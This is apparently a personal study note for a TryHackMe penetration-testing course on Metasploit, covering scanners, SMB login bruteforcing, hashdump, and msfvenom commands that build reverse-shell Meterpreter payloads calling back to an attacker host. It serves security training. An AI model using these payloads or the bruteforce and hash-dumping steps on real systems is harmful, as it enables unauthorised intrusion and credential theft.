TryHackMe: Jr. Penetration Tester
author: Nathan Acks
Exploitation with Metasploit
search portscan to display built-in Metasploit port scanners. Note that
msfconsole needs to be run as root for many scans to work - just like Nmap. That said, in my experience the fancier TCP scans (for example, SYN) don’t work over a VPN… So maybe best to stick with Nmap.
Speaking of which, Nmap can also be called internally (like other shell commands).
auxiliary/scanner/discovery/udp_sweep module will probe for common UDP services.
Metasploit has a variety of Samba/CIFS scanners too; use
search scanner/smb to list them.
NetBIOS = Network Basic Input/Output System
TryHackMe emphasizes the importance of examining the usage of NetBIOS for potential vulnerabilities, though it’s a bit light on specifics about what this means in practice.
show advanced to show additional module options.
auxiliary/scanner/http/http_version module will give you HTTP server version information.
auxiliary/scanner/smb/smb_login module will allow you to bruteforce Samba logins (username and/or password) using a wordlist(s).
The Metasploit Database
Get basic database status using
Create and delete workspaces (engagements) with
-a to add and
-d to delete. Switch between workspaces using
db_nmap to run Nmap (all of the regular options work) and dump the results into the Metasploit database.
services commands can then be used to display the, well, hosts and services logged by Metasploit during an engagement. Both commands support an
-S search parameter, the results of which can then be added to
RHOSTS using the
Show the payloads available for a particular exploit using
show payloads. Use
set payload to set the payload for the exploit; re-run
show options after this to check if the payload has added any additional options that will need to be set before exploitation.
To dump NTLM hashes from Meterpreter, use the
hashdump command. Normally only the first four fields are relevant:
- RID (the last four digits of the Windows SID, with leading zeros dropped)
- The user’s LM password hash
- The user’s NTLM password hash
sessions to, well, manage your sessions (most useful when you’ve backgrounded a payload and/or are working with multiple targets).
Msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts.
--list formats to see available encoding formats.
# 32-bit Linux ELF Meterpreter payload # msfvenom -p linux/x86/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f elf > rev_shell # 32-bit Windows executable Meterpreter payload # msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe > rev_shell.exe # PHP Meterpreter payload # msfvenom -p php/meterpreter_reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f raw > rev_shell.php # ASP Meterpreter payload # msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f asp > rev_shell.asp # Python Meterpreter payload # msfvenom -p cmd/unix/reverse_python \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f raw > rev_shell.py
exploit/multi/handler module in Metasploit to catch the shells produced using Msfvenom (note that you’ll need to use
set payload to tell Metasploit what it’s catching!). We can catch both regular reverse shells and Meterpreter sessions this way.